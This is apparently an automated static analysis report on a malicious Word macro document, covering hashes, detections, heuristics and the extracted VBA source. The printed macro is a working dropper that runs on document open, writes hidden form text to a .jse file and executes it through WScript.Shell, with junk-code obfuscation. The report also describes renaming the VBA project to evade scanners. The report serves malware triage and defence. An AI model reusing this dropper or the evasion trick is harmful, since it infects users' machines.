Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a598fccc05d7ef80…

MALICIOUS

Office (OOXML)

164.0 KB Created: 2019-06-04 05:30:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2019-12-10
MD5: fdc4b45447867213c0396025974bf12a SHA-1: 9105d6502533439652c45d54b0d036ff699541de SHA-256: a598fccc05d7ef80bacad52cc6ee2f7674a04158026d5f7b6b76508e2a25dcb1
352 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is an OOXML document containing VBA macros, specifically an AutoOpen macro that utilizes WScript.Shell and CreateObject to execute arbitrary code. This strongly suggests the document is designed to download and execute a secondary payload, as indicated by the 'Doc.Malware.Sdrop-7011816-0' ClamAV detection. The VBA code is heavily obfuscated, making precise analysis of the payload difficult, but the intent to execute external code is clear.

Heuristics 10

  • ClamAV: Doc.Malware.Sdrop-7011816-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sdrop-7011816-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/vbaProjectSignature.bin)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    W8rsDmcH = "Set R0KFKDAL = New T0MqioX End Sub "
Set WshScript = CreateObject("WScript.Shell")
   G4pnLfWmw42 = 931534755
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    W8rsDmcH = "Set R0KFKDAL = New T0MqioX End Sub "
Set WshScript = CreateObject("WScript.Shell")
   G4pnLfWmw42 = 931534755
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
Sub autoopen()
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project carries a recognised code-signing signature info VBA_SIGNED_TRUSTED
    The VBA project is Authenticode-signed and the signer/issuer chain matches a recognised code-signing publisher or CA. Informational only — the signature is NOT yet verified to cover the current project bytes, so it does not (yet) reduce the verdict.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://t2.symcb.com0 In document text (OOXML body / shared strings)
    • http://tl.symcd.com0&In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://t1.symcb.com/ThawtePCA.crl0In document text (OOXML body / shared strings)
    • http://tl.symcb.com/tl.crl0In document text (OOXML body / shared strings)
    • https://www.thawte.com/cps0/In document text (OOXML body / shared strings)
    • https://www.thawte.com/repository0WIn document text (OOXML body / shared strings)
    • http://tl.symcb.com/tl.crt0In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3459 bytes
SHA-256: c4968ef34b220f96d55d1a5e348a41fecf063a1ca18a9b68c2bbfe0f02189aca
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub autoopen()

Test2

End Sub

Sub Test()

 Dim MyDate As Date

 MyDate = DateValue("6/1/72") + TimeValue("10:10:12")

 MsgBox str(Minute(MyDate))

 MsgBox str(Year(MyDate))

End Sub


Sub SimpleCalculator()

   Dim strExpr As String

 

   strExpr = InputBox("Что будем считать?")

   

   MsgBox strExpr & " = " & Application.Evaluate(strExpr)

End Sub


Sub a1()



  
x5sEBneTxZaP = "For Each I2ThnZ In L0sgrB "
     Set C1 = ActiveDocument
   Dim B8TzTpJwUG1
 
D3uLeRIaW = " E4UJBPSm = v2UEZMM & Trim(U9KVJ.A9ciTot()) For Each g3ltlAER In Z8UlJ "
Set B2 = UserForm1
   Dim e8mZUfpZAr3
 
b6yFXmglEFDw = " c2XRTE = x5IOauG & Trim(L3NxuKCL.r5TbiMn()) "
  pathTemplate = C1.AttachedTemplate.Path
I4mclRxP = "For Each w0xgTRe In r1lcHgv Set W2MAGNm = Nothing While Not R5tzve.T9tPfc "
Set B3 = B2.TextBox1
   d0snHwXJqnuf6 = 692486631
 
w6dCtOXErBF = "Function I9QdNLJ(E2tmtJ, x0ARt While Not N8dnaC.N5AmTKz Sub S3xbGBU  "
 
z9JFgxtcq = " B2vzbgPr = z3grFE & Trim(z9cySEa.x2cTgHNh()) End Function "
    jsText = B3.Text
   V2HdLyNzONG9 = 890606048
     
   n8bIUfZgL10 = 619597862
     
G2EqzGDhTeX = "For Each e6KgtB In F4Atr Function p1TTqp(N0qEl, H8XNsX "
 
   Dim g9WQyAkkN12
     
K1DsTTOmku = "End Function Sub G6vZQBc  "
     
v6bzUvXaZ = "For Each p5QFko In t6SOAqIT "
     
a3ksybBC = "Sub H8kqxB  Private Sub Class A2EXDGLU "
     
   k9ezQaxKT16 = 434199213
     
   Dim r5vSSaqggHP17
    
   Dim v2PspbhCkrlO18
     
   T5emVNTkDG19 = 355952764
     
   Dim f3bZEcft20
       
   t4vVJXUIZUXp21 = 982879734
            Randomize
   w3mhxosNLRMZ22 = 500268623
           
   A8rxfaTbLuU23 = 512059155
     
   g4WfdpfMhNU24 = 714177401
     
   Dim H1wriGXc25
     
   K3ToGIAxyFp26 = 239192917
    
   Dim U6pTvntgVN27
     
   Dim a7iRpkCnPSwX28
   
   H4pBSqepQlff29 = 501306310
      
   G1MyyJXnlkpr30 = 820750225
     
P3rhSaXydl = "Private Sub Class h8cnDsa For Each M0urhy In q5ZIcXOT End Function "
    file2save = pathTemplate & Chr(92) & Rnd & ".jse"
   O8iEJCzEedT32 = 698289702
     
   q4GkrfPdaya33 = 218294975
    Open file2save For Output As #94
J4cOBadKkGV = "Private Sub Class W0NoWMN Set J7kZa = New z8LvVnWX Set n1luq = Nothing "
    Print #94, jsText
l6DJwqdiNeE = "Sub z4DeSWI  "
    Close #94
   n5WitzUwUK36 = 328472828
         
   Dim h1UEuPkrvR37
 
   Dim V7sMsqqVSI38
     
   Dim c1RerPVuVJOF39
 
   Dim B5zzgHRkL40
 
W8rsDmcH = "Set R0KFKDAL = New T0MqioX End Sub "
Set WshScript = CreateObject("WScript.Shell")
   G4pnLfWmw42 = 931534755
 D = WshScript.Run(file2save, 4, False)
   p4taXRxsxDv43 = 270082398
  
   Z5tygTapdhtR44 = 459927670
  
   Dim Q6mbOMhKH45


End Sub


Sub Test2()
a1

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E1773B78-4AEB-4C8C-8494-C780CC74A129}{14431844-187F-41F3-A283-9163D0D33B50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 694272 bytes
SHA-256: 320de3e4ffabbc7778e0200a5a4d6a8dec12a319b003c37a7dd8a18c6f2f7ddd
Detection
ClamAV: Doc.Malware.Sdrop-7011816-0
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
vbaProject_01.bin vba-project OOXML VBA project: word/vbaProjectSignature.bin 5997 bytes
SHA-256: 487c3652be66efa7d720b1eaa941a9da86537e5afe61810e49c94a9cbc735d79

Open this report in the interactive analyzer, or submit your own file for analysis.